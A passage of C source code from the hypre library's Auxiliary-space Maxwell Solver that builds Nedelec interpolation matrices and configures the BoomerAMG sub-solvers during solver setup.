Piz_offd_J[i] = G_offd_J[i];
}
for (i = 0; i < G_offd_nrows; i++)
for (j = G_offd_I[i]; j < G_offd_I[i+1]; j++)
{
*Pix_offd_data++ = fabs(G_offd_data[j]) * 0.5 * Gx_data[i];
*Piy_offd_data++ = fabs(G_offd_data[j]) * 0.5 * Gy_data[i];
*Piz_offd_data++ = fabs(G_offd_data[j]) * 0.5 * Gz_data[i];
}
for (i = 0; i < G_offd_ncols; i++)
{
Pix_cmap[i] = G_cmap[i];
Piy_cmap[i] = G_cmap[i];
Piz_cmap[i] = G_cmap[i];
}
}
else
{
hypre_CSRMatrix *G_offd = hypre_ParCSRMatrixOffd(G);
HYPRE_Int *G_offd_I = hypre_CSRMatrixI(G_offd);
HYPRE_Int *G_offd_J = hypre_CSRMatrixJ(G_offd);
HYPRE_Real *G_offd_data = hypre_CSRMatrixData(G_offd);
HYPRE_Int G_offd_nrows = hypre_CSRMatrixNumRows(G_offd);
HYPRE_Int G_offd_ncols = hypre_CSRMatrixNumCols(G_offd);
HYPRE_Int G_offd_nnz = hypre_CSRMatrixNumNonzeros(G_offd);
hypre_CSRMatrix *Pix_offd = hypre_ParCSRMatrixOffd(Pix);
HYPRE_Int *Pix_offd_I = hypre_CSRMatrixI(Pix_offd);
HYPRE_Int *Pix_offd_J = hypre_CSRMatrixJ(Pix_offd);
HYPRE_Real *Pix_offd_data = hypre_CSRMatrixData(Pix_offd);
hypre_CSRMatrix *Piy_offd = hypre_ParCSRMatrixOffd(Piy);
HYPRE_Int *Piy_offd_I = hypre_CSRMatrixI(Piy_offd);
HYPRE_Int *Piy_offd_J = hypre_CSRMatrixJ(Piy_offd);
HYPRE_Real *Piy_offd_data = hypre_CSRMatrixData(Piy_offd);
HYPRE_BigInt *G_cmap = hypre_ParCSRMatrixColMapOffd(G);
HYPRE_BigInt *Pix_cmap = hypre_ParCSRMatrixColMapOffd(Pix);
HYPRE_BigInt *Piy_cmap = hypre_ParCSRMatrixColMapOffd(Piy);
if (G_offd_ncols)
for (i = 0; i < G_offd_nrows+1; i++)
{
Pix_offd_I[i] = G_offd_I[i];
Piy_offd_I[i] = G_offd_I[i];
}
for (i = 0; i < G_offd_nnz; i++)
{
Pix_offd_J[i] = G_offd_J[i];
Piy_offd_J[i] = G_offd_J[i];
}
for (i = 0; i < G_offd_nrows; i++)
for (j = G_offd_I[i]; j < G_offd_I[i+1]; j++)
{
*Pix_offd_data++ = fabs(G_offd_data[j]) * 0.5 * Gx_data[i];
*Piy_offd_data++ = fabs(G_offd_data[j]) * 0.5 * Gy_data[i];
}
for (i = 0; i < G_offd_ncols; i++)
{
Pix_cmap[i] = G_cmap[i];
Piy_cmap[i] = G_cmap[i];
}
}
}
*Pix_ptr = Pix;
*Piy_ptr = Piy;
if (dim == 3)
*Piz_ptr = Piz;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSComputeGPi
*
* Construct the matrix [G,Pi] which can be considered an interpolation
* matrix from S_h^4 (4 copies of the scalar linear finite element space)
* to the edge finite elements space.
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSComputeGPi(hypre_ParCSRMatrix *A,
hypre_ParCSRMatrix *G,
hypre_ParVector *Gx,
hypre_ParVector *Gy,
hypre_ParVector *Gz,
HYPRE_Int dim,
hypre_ParCSRMatrix **GPi_ptr)
{
hypre_ParCSRMatrix *GPi;
/* Take into account G */
dim++;
/* Compute GPi = [Pi_x, Pi_y, Pi_z, G] */
{
HYPRE_Int i, j, d;
HYPRE_Real *Gx_data, *Gy_data, *Gz_data;
MPI_Comm comm = hypre_ParCSRMatrixComm(G);
HYPRE_BigInt global_num_rows = hypre_ParCSRMatrixGlobalNumRows(G);
HYPRE_BigInt global_num_cols = dim*hypre_ParCSRMatrixGlobalNumCols(G);
HYPRE_BigInt *row_starts = hypre_ParCSRMatrixRowStarts(G);
HYPRE_BigInt *col_starts;
HYPRE_Int col_starts_size;
HYPRE_Int num_cols_offd = dim*hypre_CSRMatrixNumCols(hypre_ParCSRMatrixOffd(G));
HYPRE_Int num_nonzeros_diag = dim*hypre_CSRMatrixNumNonzeros(hypre_ParCSRMatrixDiag(G));
HYPRE_Int num_nonzeros_offd = dim*hypre_CSRMatrixNumNonzeros(hypre_ParCSRMatrixOffd(G));
HYPRE_BigInt *col_starts_G = hypre_ParCSRMatrixColStarts(G);
col_starts_size = 2;
col_starts = hypre_TAlloc(HYPRE_BigInt, col_starts_size, HYPRE_MEMORY_HOST);
for (i = 0; i < col_starts_size; i++)
col_starts[i] = (HYPRE_BigInt) dim * col_starts_G[i];
GPi = hypre_ParCSRMatrixCreate(comm,
global_num_rows,
global_num_cols,
row_starts,
col_starts,
num_cols_offd,
num_nonzeros_diag,
num_nonzeros_offd);
hypre_ParCSRMatrixOwnsData(GPi) = 1;
hypre_ParCSRMatrixOwnsRowStarts(GPi) = 0;
hypre_ParCSRMatrixOwnsColStarts(GPi) = 1;
hypre_ParCSRMatrixInitialize(GPi);
Gx_data = hypre_VectorData(hypre_ParVectorLocalVector(Gx));
Gy_data = hypre_VectorData(hypre_ParVectorLocalVector(Gy));
if (dim == 4)
Gz_data = hypre_VectorData(hypre_ParVectorLocalVector(Gz));
/* Fill-in the diagonal part */
{
hypre_CSRMatrix *G_diag = hypre_ParCSRMatrixDiag(G);
HYPRE_Int *G_diag_I = hypre_CSRMatrixI(G_diag);
HYPRE_Int *G_diag_J = hypre_CSRMatrixJ(G_diag);
HYPRE_Real *G_diag_data = hypre_CSRMatrixData(G_diag);
HYPRE_Int G_diag_nrows = hypre_CSRMatrixNumRows(G_diag);
HYPRE_Int G_diag_nnz = hypre_CSRMatrixNumNonzeros(G_diag);
hypre_CSRMatrix *GPi_diag = hypre_ParCSRMatrixDiag(GPi);
HYPRE_Int *GPi_diag_I = hypre_CSRMatrixI(GPi_diag);
HYPRE_Int *GPi_diag_J = hypre_CSRMatrixJ(GPi_diag);
HYPRE_Real *GPi_diag_data = hypre_CSRMatrixData(GPi_diag);
for (i = 0; i < G_diag_nrows+1; i++)
GPi_diag_I[i] = dim * G_diag_I[i];
for (i = 0; i < G_diag_nnz; i++)
for (d = 0; d < dim; d++)
GPi_diag_J[dim*i+d] = dim*G_diag_J[i]+d;
for (i = 0; i < G_diag_nrows; i++)
for (j = G_diag_I[i]; j < G_diag_I[i+1]; j++)
{
*GPi_diag_data++ = G_diag_data[j];
*GPi_diag_data++ = fabs(G_diag_data[j]) * 0.5 * Gx_data[i];
*GPi_diag_data++ = fabs(G_diag_data[j]) * 0.5 * Gy_data[i];
if (dim == 4)
*GPi_diag_data++ = fabs(G_diag_data[j]) * 0.5 * Gz_data[i];
}
}
/* Fill-in the off-diagonal part */
{
hypre_CSRMatrix *G_offd = hypre_ParCSRMatrixOffd(G);
HYPRE_Int *G_offd_I = hypre_CSRMatrixI(G_offd);
HYPRE_Int *G_offd_J = hypre_CSRMatrixJ(G_offd);
HYPRE_Real *G_offd_data = hypre_CSRMatrixData(G_offd);
HYPRE_Int G_offd_nrows = hypre_CSRMatrixNumRows(G_offd);
HYPRE_Int G_offd_ncols = hypre_CSRMatrixNumCols(G_offd);
HYPRE_Int G_offd_nnz = hypre_CSRMatrixNumNonzeros(G_offd);
hypre_CSRMatrix *GPi_offd = hypre_ParCSRMatrixOffd(GPi);
HYPRE_Int *GPi_offd_I = hypre_CSRMatrixI(GPi_offd);
HYPRE_Int *GPi_offd_J = hypre_CSRMatrixJ(GPi_offd);
HYPRE_Real *GPi_offd_data = hypre_CSRMatrixData(GPi_offd);
HYPRE_BigInt *G_cmap = hypre_ParCSRMatrixColMapOffd(G);
HYPRE_BigInt *GPi_cmap = hypre_ParCSRMatrixColMapOffd(GPi);
if (G_offd_ncols)
for (i = 0; i < G_offd_nrows+1; i++)
GPi_offd_I[i] = dim * G_offd_I[i];
for (i = 0; i < G_offd_nnz; i++)
for (d = 0; d < dim; d++)
GPi_offd_J[dim*i+d] = dim*G_offd_J[i]+d;
for (i = 0; i < G_offd_nrows; i++)
for (j = G_offd_I[i]; j < G_offd_I[i+1]; j++)
{
*GPi_offd_data++ = G_offd_data[j];
*GPi_offd_data++ = fabs(G_offd_data[j]) * 0.5 * Gx_data[i];
*GPi_offd_data++ = fabs(G_offd_data[j]) * 0.5 * Gy_data[i];
if (dim == 4)
*GPi_offd_data++ = fabs(G_offd_data[j]) * 0.5 * Gz_data[i];
}
for (i = 0; i < G_offd_ncols; i++)
for (d = 0; d < dim; d++)
GPi_cmap[dim*i+d] = dim*G_cmap[i]+d;
}
}
*GPi_ptr = GPi;
return hypre_error_flag;
}
/*--------------------------------------------------------------------------
* hypre_AMSSetup
*
* Construct the AMS solver components.
*
* The following functions need to be called before hypre_AMSSetup():
* - hypre_AMSSetDimension() (if solving a 2D problem)
* - hypre_AMSSetDiscreteGradient()
* - hypre_AMSSetCoordinateVectors() or hypre_AMSSetEdgeConstantVectors
*--------------------------------------------------------------------------*/
HYPRE_Int hypre_AMSSetup(void *solver,
hypre_ParCSRMatrix *A,
hypre_ParVector *b,
hypre_ParVector *x)
{
hypre_AMSData *ams_data = (hypre_AMSData *) solver;
HYPRE_Int input_info = 0;
ams_data -> A = A;
/* Modifications for problems with zero-conductivity regions */
if (ams_data -> interior_nodes)
{
hypre_ParCSRMatrix *G0t, *Aorig = A;
/* Make sure that multiple Setup()+Solve() give identical results */
ams_data -> solve_counter = 0;
/* Construct the discrete gradient matrix for the zero-conductivity region
by eliminating the zero-conductivity nodes from G^t. The range of G0
represents the kernel of A, i.e. the gradients of nodal basis functions
supported in zero-conductivity regions. */
hypre_ParCSRMatrixTranspose(ams_data -> G, &G0t, 1);
{
HYPRE_Int i, j;
HYPRE_Int nv = hypre_ParCSRMatrixNumCols(ams_data -> G);
hypre_CSRMatrix *G0td = hypre_ParCSRMatrixDiag(G0t);
HYPRE_Int *G0tdI = hypre_CSRMatrixI(G0td);
HYPRE_Real *G0tdA = hypre_CSRMatrixData(G0td);
hypre_CSRMatrix *G0to = hypre_ParCSRMatrixOffd(G0t);
HYPRE_Int *G0toI = hypre_CSRMatrixI(G0to);
HYPRE_Real *G0toA = hypre_CSRMatrixData(G0to);
HYPRE_Real *interior_nodes_data=hypre_VectorData(
hypre_ParVectorLocalVector((hypre_ParVector*) ams_data -> interior_nodes));
for (i = 0; i < nv; i++)
{
if (interior_nodes_data[i] != 1)
{
for (j = G0tdI[i]; j < G0tdI[i+1]; j++)
G0tdA[j] = 0.0;
if (G0toI)
for (j = G0toI[i]; j < G0toI[i+1]; j++)
G0toA[j] = 0.0;
}
}
}
hypre_ParCSRMatrixTranspose(G0t, & ams_data -> G0, 1);
/* Construct the subspace matrix A_G0 = G0^T G0 */
ams_data -> A_G0 = hypre_ParMatmul(G0t, ams_data -> G0);
hypre_ParCSRMatrixFixZeroRows(ams_data -> A_G0);
/* Create AMG solver for A_G0 */
HYPRE_BoomerAMGCreate(&ams_data -> B_G0);
HYPRE_BoomerAMGSetCoarsenType(ams_data -> B_G0, ams_data -> B_G_coarsen_type);
HYPRE_BoomerAMGSetAggNumLevels(ams_data -> B_G0, ams_data -> B_G_agg_levels);
HYPRE_BoomerAMGSetRelaxType(ams_data -> B_G0, ams_data -> B_G_relax_type);
HYPRE_BoomerAMGSetNumSweeps(ams_data -> B_G0, 1);
HYPRE_BoomerAMGSetMaxLevels(ams_data -> B_G0, 25);
HYPRE_BoomerAMGSetTol(ams_data -> B_G0, 0.0);
HYPRE_BoomerAMGSetMaxIter(ams_data -> B_G0, 3); /* use just a few V-cycles */
HYPRE_BoomerAMGSetStrongThreshold(ams_data -> B_G0, ams_data -> B_G_theta);
HYPRE_BoomerAMGSetInterpType(ams_data -> B_G0, ams_data -> B_G_interp_type);
HYPRE_BoomerAMGSetPMaxElmts(ams_data -> B_G0, ams_data -> B_G_Pmax);
HYPRE_BoomerAMGSetMinCoarseSize(ams_data -> B_G0, 2); /* don't coarsen to 0 */
/* Generally, don't use exact solve on the coarsest level (matrix may be singular) */
HYPRE_BoomerAMGSetCycleRelaxType(ams_data -> B_G0, ams_data -> B_G_coarse_relax_type, 3);
HYPRE_BoomerAMGSetup(ams_data -> B_G0,
(HYPRE_ParCSRMatrix)ams_data -> A_G0,
0, 0);
/* Construct the preconditioner for ams_data->A = A + G0 G0^T.
NOTE: this can be optimized significantly by taking into account that
the sparsity pattern of A is subset of the sparsity pattern of G0 G0^T */
{
hypre_ParCSRMatrix *A = hypre_ParMatmul(ams_data -> G0, G0t);
hypre_ParCSRMatrix *B = Aorig;
hypre_ParCSRMatrix **C_ptr = &ams_data -> A;
hypre_ParCSRMatrix *C;
HYPRE_Real factor, lfactor;
/* scale (penalize) G0 G0^T before adding it to the matrix */
{
HYPRE_Int i;
HYPRE_Int B_num_rows = hypre_CSRMatrixNumRows(hypre_ParCSRMatrixDiag(B));
HYPRE_Real *B_diag_data = hypre_CSRMatrixData(hypre_ParCSRMatrixDiag(B));
HYPRE_Real *B_offd_data = hypre_CSRMatrixData(hypre_ParCSRMatrixOffd(B));
HYPRE_Int *B_diag_i = hypre_CSRMatrixI(hypre_ParCSRMatrixDiag(B));
HYPRE_Int *B_offd_i = hypre_CSRMatrixI(hypre_ParCSRMatrixOffd(B));
lfactor = -1;
for (i = 0; i < B_diag_i[B_num_rows]; i++)
if (fabs(B_diag_data[i]) > lfactor)
lfactor = fabs(B_diag_data[i]);
for (i = 0; i < B_offd_i[B_num_rows]; i++)
if (fabs(B_offd_data[i]) > lfactor)
lfactor = fabs(B_offd_data[i]);
lfactor *= 1e-10; /* scaling factor: max|A_ij|*1e-10 */
hypre_MPI_Allreduce(&lfactor, &factor, 1, HYPRE_MPI_REAL, hypre_MPI_MAX,
hypre_ParCSRMatrixComm(A));
}
hypre_ParcsrAdd(factor, A, 1.0, B, &C);
/*hypre_CSRMatrix *A_local, *B_local, *C_local, *C_tmp;
MPI_Comm comm = hypre_ParCSRMatrixComm(A);
HYPRE_BigInt global_num_rows = hypre_ParCSRMatrixGlobalNumRows(A);
HYPRE_BigInt global_num_cols = hypre_ParCSRMatrixGlobalNumCols(A);
HYPRE_BigInt *row_starts = hypre_ParCSRMatrixRowStarts(A);
HYPRE_BigInt *col_starts = hypre_ParCSRMatrixColStarts(A);
HYPRE_Int A_num_cols_offd = hypre_CSRMatrixNumCols(hypre_ParCSRMatrixOffd(A));
HYPRE_Int A_num_nonzeros_diag = hypre_CSRMatrixNumNonzeros(hypre_ParCSRMatrixDiag(A));
HYPRE_Int A_num_nonzeros_offd = hypre_CSRMatrixNumNonzeros(hypre_ParCSRMatrixOffd(A));
HYPRE_Int B_num_cols_offd = hypre_CSRMatrixNumCols(hypre_ParCSRMatrixOffd(B));
HYPRE_Int B_num_nonzeros_diag = hypre_CSRMatrixNumNonzeros(hypre_ParCSRMatrixDiag(B));
HYPRE_Int B_num_nonzeros_offd = hypre_CSRMatrixNumNonzeros(hypre_ParCSRMatrixOffd(B));
A_local = hypre_MergeDiagAndOffd(A);
B_local = hypre_MergeDiagAndOffd(B);*/
/* scale (penalize) G0 G0^T before adding it to the matrix */
/*{
HYPRE_Int i, nnz = hypre_CSRMatrixNumNonzeros(A_local);
HYPRE_Real *data = hypre_CSRMatrixData(A_local);
HYPRE_Real *dataB = hypre_CSRMatrixData(B_local);
HYPRE_Int nnzB = hypre_CSRMatrixNumNonzeros(B_local);
HYPRE_Real factor, lfactor;
lfactor = -1;
for (i = 0; i < nnzB; i++)
if (fabs(dataB[i]) > lfactor)
lfactor = fabs(dataB[i]);
lfactor *= 1e-10;
hypre_MPI_Allreduce(&lfactor, &factor, 1, HYPRE_MPI_REAL, hypre_MPI_MAX,
hypre_ParCSRMatrixComm(A));
for (i = 0; i < nnz; i++)
data[i] *= factor;
}
C_tmp = hypre_CSRMatrixBigAdd(A_local, B_local);
C_local = hypre_CSRMatrixBigDeleteZeros(C_tmp,0.0);
if (C_local)
hypre_CSRMatrixDestroy(C_tmp);
else
C_local = C_tmp;
C = hypre_ParCSRMatrixCreate (comm,
global_num_rows,
global_num_cols,
row_starts,
col_starts,
A_num_cols_offd + B_num_cols_offd,
A_num_nonzeros_diag + B_num_nonzeros_diag,
A_num_nonzeros_offd + B_num_nonzeros_offd);
GenerateDiagAndOffd(C_local, C,
hypre_ParCSRMatrixFirstColDiag(A),
hypre_ParCSRMatrixLastColDiag(A));
hypre_ParCSRMatrixOwnsRowStarts(C) = 0;
hypre_ParCSRMatrixOwnsColStarts(C) = 1;
hypre_ParCSRMatrixOwnsColStarts(G0t) = 0;
hypre_CSRMatrixDestroy(A_local);
hypre_CSRMatrixDestroy(B_local);
hypre_CSRMatrixDestroy(C_local);
*/
hypre_ParCSRMatrixDestroy(A);
*C_ptr = C;
}
hypre_ParCSRMatrixDestroy(G0t);
}
/* Make sure that the first entry in each row is the diagonal one. */
/* hypre_CSRMatrixReorder(hypre_ParCSRMatrixDiag(ams_data -> A)); */
/* Compute the l1 norm of the rows of A */
if (ams_data -> A_relax_type >= 1 && ams_data -> A_relax_type <= 4)
{
HYPRE_Real *l1_norm_data = NULL;
hypre_ParCSRComputeL1Norms(ams_data -> A, ams_data -> A_relax_type, NULL, &l1_norm_data);
ams_data -> A_l1_norms = hypre_SeqVectorCreate(hypre_ParCSRMatrixNumRows(ams_data -> A));
hypre_VectorData(ams_data -> A_l1_norms) = l1_norm_data;
hypre_SeqVectorInitialize_v2(ams_data -> A_l1_norms, hypre_ParCSRMatrixMemoryLocation(ams_data -> A));
}
/* Chebyshev? */
if (ams_data -> A_relax_type == 16)
{
hypre_ParCSRMaxEigEstimateCG(ams_data->A, 1, 10,
&ams_data->A_max_eig_est,
&ams_data->A_min_eig_est);
}
/* If not given, compute Gx, Gy and Gz */
{
if (ams_data -> x != NULL && ams_data -> y != NULL &&
(ams_data -> dim == 2 || ams_data -> z != NULL))
input_info = 1;
if (ams_data -> Gx != NULL && ams_data -> Gy != NULL &&
(ams_data -> dim == 2 || ams_data -> Gz != NULL))
input_info = 2;
if (input_info == 1)
{
ams_data -> Gx = hypre_ParVectorInRangeOf(ams_data -> G);
hypre_ParCSRMatrixMatvec (1.0, ams_data -> G, ams_data -> x, 0.0, ams_data -> Gx);
ams_data -> Gy = hypre_ParVectorInRangeOf(ams_data -> G);
hypre_ParCSRMatrixMatvec (1.0, ams_data -> G, ams_data -> y, 0.0, ams_data -> Gy);
if (ams_data -> dim == 3)
{
ams_data -> Gz = hypre_ParVectorInRangeOf(ams_data -> G);
hypre_ParCSRMatrixMatvec (1.0, ams_data -> G, ams_data -> z, 0.0, ams_data -> Gz);
}
}
}
if (ams_data -> Pi == NULL && ams_data -> Pix == NULL)
{
if (ams_data -> cycle_type == 20)
/* Construct the combined interpolation matrix [G,Pi] */
hypre_AMSComputeGPi(ams_data -> A,
ams_data -> G,
ams_data -> Gx,
ams_data -> Gy,
ams_data -> Gz,
ams_data -> dim,
&ams_data -> Pi);
else if (ams_data -> cycle_type > 10)
/* Construct Pi{x,y,z} instead of Pi = [Pix,Piy,Piz] */
hypre_AMSComputePixyz(ams_data -> A,
ams_data -> G,
ams_data -> Gx,
ams_data -> Gy,
ams_data -> Gz,
ams_data -> dim,
&ams_data -> Pix,
&ams_data -> Piy,
&ams_data -> Piz);
else
/* Construct the Pi interpolation matrix */
hypre_AMSComputePi(ams_data -> A,
ams_data -> G,
ams_data -> Gx,
ams_data -> Gy,
ams_data -> Gz,
ams_data -> dim,
&ams_data -> Pi);
}
/* Keep Gx, Gy and Gz only if use the method with discrete divergence
stabilization (where we use them to compute the local mesh size). */
if (input_info == 1 && ams_data -> cycle_type != 9)
{
hypre_ParVectorDestroy(ams_data -> Gx);
hypre_ParVectorDestroy(ams_data -> Gy);
if (ams_data -> dim == 3)
hypre_ParVectorDestroy(ams_data -> Gz);
}
/* Create the AMG solver on the range of G^T */
if (!ams_data -> beta_is_zero && ams_data -> cycle_type != 20)
{
HYPRE_BoomerAMGCreate(&ams_data -> B_G);
HYPRE_BoomerAMGSetCoarsenType(ams_data -> B_G, ams_data -> B_G_coarsen_type);
HYPRE_BoomerAMGSetAggNumLevels(ams_data -> B_G, ams_data -> B_G_agg_levels);
HYPRE_BoomerAMGSetRelaxType(ams_data -> B_G, ams_data -> B_G_relax_type);
HYPRE_BoomerAMGSetNumSweeps(ams_data -> B_G, 1);
HYPRE_BoomerAMGSetMaxLevels(ams_data -> B_G, 25);
HYPRE_BoomerAMGSetTol(ams_data -> B_G, 0.0);
HYPRE_BoomerAMGSetMaxIter(ams_data -> B_G, 1);
HYPRE_BoomerAMGSetStrongThreshold(ams_data -> B_G, ams_data -> B_G_theta);
HYPRE_BoomerAMGSetInterpType(ams_data -> B_G, ams_data -> B_G_interp_type);
HYPRE_BoomerAMGSetPMaxElmts(ams_data -> B_G, ams_data -> B_G_Pmax);
HYPRE_BoomerAMGSetMinCoarseSize(ams_data -> B_G, 2); /* don't coarsen to 0 */
/* Generally, don't use exact solve on the coarsest level (matrix may be singular) */
HYPRE_BoomerAMGSetCycleRelaxType(ams_data -> B_G, ams_data -> B_G_coarse_relax_type, 3);
if (ams_data -> cycle_type == 0)
HYPRE_BoomerAMGSetMaxLevels(ams_data -> B_G, 2);
/* If not given, construct the coarse space matrix by RAP */
if (!ams_data -> A_G)
{
HYPRE_Int G_owned_col_starts;
if (!hypre_ParCSRMatrixCommPkg(ams_data -> G))
hypre_MatvecCommPkgCreate(ams_data -> G);
if (!hypre_ParCSRMatrixCommPkg(ams_data -> A))
hypre_MatvecCommPkgCreate(ams_data -> A);
G_owned_col_starts = hypre_ParCSRMatrixOwnsColStarts(ams_data -> G);
hypre_BoomerAMGBuildCoarseOperator(ams_data -> G,
ams_data -> A,
ams_data -> G,
&ams_data -> A_G);
/* Make sure that A_G has no zero rows (this can happen
if beta is zero in part of the domain). */
hypre_ParCSRMatrixFixZeroRows(ams_data -> A_G);
hypre_ParCSRMatrixOwnsColStarts(ams_data -> G) = G_owned_col_starts;
hypre_ParCSRMatrixOwnsRowStarts(ams_data -> A_G) = 0;
ams_data -> owns_A_G = 1;
}
HYPRE_BoomerAMGSetup(ams_data -> B_G,
(HYPRE_ParCSRMatrix)ams_data -> A_G,
0, 0);
}
if (ams_data -> cycle_type > 10 && ams_data -> cycle_type != 20)
/* Create the AMG solvers on the range of Pi{x,y,z}^T */
{
HYPRE_Int P_owned_col_starts;
HYPRE_BoomerAMGCreate(&ams_data -> B_Pix);
HYPRE_BoomerAMGSetCoarsenType(ams_data -> B_Pix, ams_data -> B_Pi_coarsen_type);
HYPRE_BoomerAMGSetAggNumLevels(ams_data -> B_Pix, ams_data -> B_Pi_agg_levels);
HYPRE_BoomerAMGSetRelaxType(ams_data -> B_Pix, ams_data -> B_Pi_relax_type);
HYPRE_BoomerAMGSetNumSweeps(ams_data -> B_Pix, 1);
HYPRE_BoomerAMGSetMaxLevels(ams_data -> B_Pix, 25);
HYPRE_BoomerAMGSetTol(ams_data -> B_Pix, 0.0);
HYPRE_BoomerAMGSetMaxIter(ams_data -> B_Pix, 1);
HYPRE_BoomerAMGSetStrongThreshold(ams_data -> B_Pix, ams_data -> B_Pi_theta);
HYPRE_BoomerAMGSetInterpType(ams_data -> B_Pix, ams_data -> B_Pi_interp_type);
HYPRE_BoomerAMGSetPMaxElmts(ams_data -> B_Pix, ams_data -> B_Pi_Pmax);
HYPRE_BoomerAMGSetMinCoarseSize(ams_data -> B_Pix, 2);
HYPRE_BoomerAMGCreate(&ams_data -> B_Piy);
HYPRE_BoomerAMGSetCoarsenType(ams_data -> B_Piy, ams_data -> B_Pi_coarsen_type);
HYPRE_BoomerAMGSetAggNumLevels(ams_data -> B_Piy, ams_data -> B_Pi_agg_levels);
HYPRE_BoomerAMGSetRelaxType(ams_data -> B_Piy, ams_data -> B_Pi_relax_type);
HYPRE_BoomerAMGSetNumSweeps(ams_data -> B_Piy, 1);
HYPRE_BoomerAMGSetMaxLevels(ams_data -> B_Piy, 25);
HYPRE_BoomerAMGSetTol(ams_data -> B_Piy, 0.0);
HYPRE_BoomerAMGSetMaxIter(ams_data -> B_Piy, 1);
HYPRE_BoomerAMGSetStrongThreshold(ams_data -> B_Piy, ams_data -> B_Pi_theta);
HYPRE_BoomerAMGSetInterpType(ams_data -> B_Piy, ams_data -> B_Pi_interp_type);
HYPRE_BoomerAMGSetPMaxElmts(ams_data -> B_Piy, ams_data -> B_Pi_Pmax);
HYPRE_BoomerAMGSetMinCoarseSize(ams_data -> B_Piy, 2);
HYPRE_BoomerAMGCreate(&ams_data -> B_Piz);
HYPRE_BoomerAMGSetCoarsenType(ams_data -> B_Piz, ams_data -> B_Pi_coarsen_type);
HYPRE_BoomerAMGSetAggNumLevels(ams_data -> B_Piz, ams_data -> B_Pi_agg_levels);
HYPRE_BoomerAMGSetRelaxType(ams_data -> B_Piz, ams_data -> B_Pi_relax_type);
HYPRE_BoomerAMGSetNumSweeps(ams_data -> B_Piz, 1);
HYPRE_BoomerAMGSetMaxLevels(ams_data -> B_Piz, 25);
HYPRE_BoomerAMGSetTol(ams_data -> B_Piz, 0.0);
HYPRE_BoomerAMGSetMaxIter(ams_data -> B_Piz, 1);
HYPRE_BoomerAMGSetStrongThreshold(ams_data -> B_Piz, ams_data -> B_Pi_theta);
HYPRE_BoomerAMGSetInterpType(ams_data -> B_Piz, ams_data -> B_Pi_interp_type);
HYPRE_BoomerAMGSetPMaxElmts(ams_data -> B_Piz, ams_data -> B_Pi_Pmax);
HYPRE_BoomerAMGSetMinCoarseSize(ams_data -> B_Piz, 2);
/* Generally, don't use exact solve on the coarsest level (matrices may be singular) */
HYPRE_BoomerAMGSetCycleRelaxType(ams_data -> B_Pix, ams_data -> B_Pi_coarse_relax_type, 3);
HYPRE_BoomerAMGSetCycleRelaxType(ams_data -> B_Piy, ams_data -> B_Pi_coarse_relax_type, 3);
HYPRE_BoomerAMGSetCycleRelaxType(ams_data -> B_Piz, ams_data -> B_Pi_coarse_relax_type, 3);
if (ams_data -> cycle_type == 0)
{
HYPRE_BoomerAMGSetMaxLevels(ams_data -> B_Pix, 2);
HYPRE_BoomerAMGSetMaxLevels(ams_data -> B_Piy, 2);
HYPRE_BoomerAMGSetMaxLevels(ams_data -> B_Piz, 2);
}
/* Construct the coarse space matrices by RAP */
if (!hypre_ParCSRMatrixCommPkg(ams_data -> Pix))
hypre_MatvecCommPkgCreate(ams_data -> Pix);
P_owned_col_starts = hypre_ParCSRMatrixOwnsColStarts(ams_data -> Pix);
hypre_BoomerAMGBuildCoarseOperator(ams_data -> Pix,
ams_data -> A,
ams_data -> Pix,
&ams_data -> A_Pix);
if (!P_owned_col_starts)
{
hypre_ParCSRMatrixOwnsRowStarts(ams_data -> A_Pix) = 0;
hypre_ParCSRMatrixOwnsColStarts(ams_data -> A_Pix) = 0;
}
/* Make sure that A_Pix has no zero rows (this can happen
for some kinds of boundary conditions with contact). */
hypre_ParCSRMatrixFixZeroRows(ams_data -> A_Pix);
HYPRE_BoomerAMGSetup(ams_data -> B_Pix,
(HYPRE_ParCSRMatrix)ams_data -> A_Pix,
0, 0);
if (!hypre_ParCSRMatrixCommPkg(ams_data -> Piy))
hypre_MatvecCommPkgCreate(ams_data -> Piy);
P_owned_col_starts = hypre_ParCSRMatrixOwnsColStarts(ams_data -> Piy);
hypre_BoomerAMGBuildCoarseOperator(ams_data -> Piy,
ams_data -> A,
ams_data -> Piy,
&ams_data -> A_Piy);
if (!P_owned_col_starts)
{
hypre_ParCSRMatrixOwnsRowStarts(ams_data -> A_Piy) = 0;
hypre_ParCSRMatrixOwnsColStarts(ams_data -> A_Piy) = 0;
}
/* Make sure that A_Piy has no zero rows (this can happen
for some kinds of boundary conditions with contact). */
hypre_ParCSRMatrixFixZeroRows(ams_data -> A_Piy);
HYPRE_BoomerAMGSetup(ams_data -> B_Piy,
(HYPRE_ParCSRMatrix)ams_data -> A_Piy,
0, 0);
if (ams_data -> Piz)
{
if (!hypre_ParCSRMatrixCommPkg(ams_data -> Piz))
hypre_MatvecCommPkgCreate(ams_data -> Piz);
P_owned_col_starts = hypre_ParCSRMatrixOwnsColStarts(ams_data -> Piz);
hypre_BoomerAMGBuildCoarseOperator(ams_data -> Piz,
ams_data -> A,
ams_data -> Piz,
&ams_data -> A_Piz);
if (!P_owned_col_starts)
{
hypre_ParCSRMatrixOwnsRowStarts(ams_data -> A_Piz) = 0;
hypre_ParCSRMatrixOwnsColStarts(ams_data -> A_Piz) = 0;
}
/* Make sure that A_Piz has no zero rows (this can happen
for some kinds of boundary conditions with contact). */
hypre_ParCSRMatrixFixZeroRows(ams_data -> A_Piz);
HYPRE_BoomerAMGSetup(ams_data -> B_Piz,
(HYPRE_ParCSRMatrix)ams_data -> A_Piz,
0, 0);
}
}
else
/* Create the AMG solver on the range of Pi^T */
{
HYPRE_BoomerAMGCreate(&ams_data -> B_Pi);
HYPRE_BoomerAMGSetCoarsenType(ams_data -> B_Pi, ams_data -> B_Pi_coarsen_type);
HYPRE_BoomerAMGSetAggNumLevels(ams_data -> B_Pi, ams_data -> B_Pi_agg_levels);
HYPRE_BoomerAMGSetRelaxType(ams_data -> B_Pi, ams_data -> B_Pi_relax_type);
HYPRE_BoomerAMGSetNumSweeps(ams_data -> B_Pi, 1);
HYPRE_BoomerAMGSetMaxLevels(ams_data -> B_Pi, 25);
HYPRE_BoomerAMGSetTol(ams_data -> B_Pi, 0.0);
HYPRE_BoomerAMGSetMaxIter(ams_data -> B_Pi, 1);
HYPRE_BoomerAMGSetStrongThreshold(ams_data -> B_Pi, ams_data -> B_Pi_theta);
HYPRE_BoomerAMGSetInterpType(ams_data -> B_Pi, ams_data -> B_Pi_interp_type);
